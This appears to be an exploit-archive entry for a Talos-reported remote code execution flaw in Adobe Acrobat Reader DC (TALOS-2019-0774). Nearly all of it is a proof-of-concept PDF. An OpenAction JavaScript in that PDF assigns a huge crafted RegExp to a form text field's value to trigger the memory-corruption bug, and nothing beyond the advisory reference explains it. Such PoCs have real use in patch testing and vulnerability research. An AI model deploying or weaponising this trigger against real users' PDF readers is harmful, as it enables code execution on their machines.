Info
From Talos :
Adobe Acrobat Reader DC text field value remote code execution vulnerability — redux
PoC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59
| %PDF-1.5
1 0 obj << /Kids [<< /Annots [<< /Subtype /Text /Rect[0 0 0 0] /Subj (Hello World!) >> << /Subtype /Text /Rect[0 0 0 0] /Subj (Hello zzzWorld!) >>] /Parent 1 0 R /Contents[3 0 R] >>] /Resources<<>> >> %endobj
3 0 obj<<>> stream BT/F1 105 Tf 0 400 Td(Adobe Reader)Tj ET endstream endobj
trailer << /Root << /AcroForm << /Fields [ << /Rect[10 10 10 10] /Subtype/Widget /T(mytext) /V(this is a text) /FT/Tx >> ] >> /OpenAction << /S /JavaScript /JS( var r = new RegExp(Array(32770).join(String.fromCharCode(24))); this.getField('mytext')['value'] = r; ) >> /Pages 1 0 R >> >>
|
Reference
TALOS-2019-0774